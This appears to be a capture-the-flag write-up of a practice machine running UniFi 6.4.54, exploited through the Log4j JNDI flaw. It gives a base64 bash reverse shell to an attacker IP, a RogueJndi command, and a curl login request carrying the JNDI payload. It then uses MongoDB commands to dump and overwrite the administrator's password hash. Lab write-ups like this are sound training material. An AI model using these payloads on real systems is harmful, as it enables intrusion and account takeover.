After the initial Nmap scan we have 6 ports open
1
2
3
4
5
6
7
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
6789/tcp open ibm-db2-admin syn-ack
8080/tcp open http-proxy syn-ack
8443/tcp open https-alt syn-ack
8843/tcp open unknown syn-ack
8880/tcp open cddbp-alt syn-ack
we also find a unifi login 6.4.54 https://unified.htb:8443/manage/account/login?redirect=%2Fmanage
I have exploited this version of unifi once before it had the Log4j CVE-2021-44228 vulnerability.
Following sprocket security’s guide
Starting by installing maven and compiling the rogue-jndi, which is a LDAP server for JNDI injection attacks.
Once the Jar is compiled we need to make a command to deliver the reverse shell. we craft this and base64 encode it.
echo 'bash -c bash -i >&/dev/tcp/10.10.16.193/6985 0>&1' | base64
then insert into our rogue-JNDI command
java -jar rogue-jndi/target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTYuMTkzLzY5ODUgMD4mMQo=}|{base64,-d}|{bash,-i}" --hostname "10.10.16.193"
Then to get a reverse shell we can use this cURL command
curl -i -s -k -X POST -H $'Host: 10.129.207.100:8443' -H $'Content-Length: 104' --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://10.10.16.193:1389/o=tomcat}\",\"strict\":true}' $'https://10.129.207.100:8443/manage/account/login'
for whatever reason my curl request isnt working but capturing in burp and sending the payload through there gets us a reverse shell on 6985.
There is no python available on this machine to upgrade our shell but we can use script /dev/null -c bash to get the same effect.
Once we are inside the exploiters found that the MongoDB instance storing all of the application information is listening on localhost without authentication. That mean we can read from and make changed to the local MongoDB instance. we can extract password hashes, reset admin password, add a shadow admin.
Replacing admin password
Dump password hashes from local db. This command will dump a JSON array of users, privileges and password hashes.
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
1
2
3
4
"_id" : ObjectId("61ce278f46e0fb0012d47ee4"),
"name" : "administrator",
"email" : "administrator@unified.htb",
"x_shadow" : "$6$Ry6Vdbse$8enMR5Znxoo.WfCMd/Xk65GwuQEPx1M.QP8/qHiQV0PvUc3uHuonK4WcTQFN1CRk3GwQaquyVwCVq8iQgPTt4.",
create a new sha-512 pass mkpasswd -m sha-512 password
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$12ZN9Uh2iuQRjoTM$jmc2jIzCTMPU.kFp7driwLcqqOh6rffa1zysWCai2WKy79JjMvpU/DmfRagkHeUZdlpmee6hP/wo.5.LialJw0"}})'
we can then login and grab the root ssh password and get anything we need from the machine.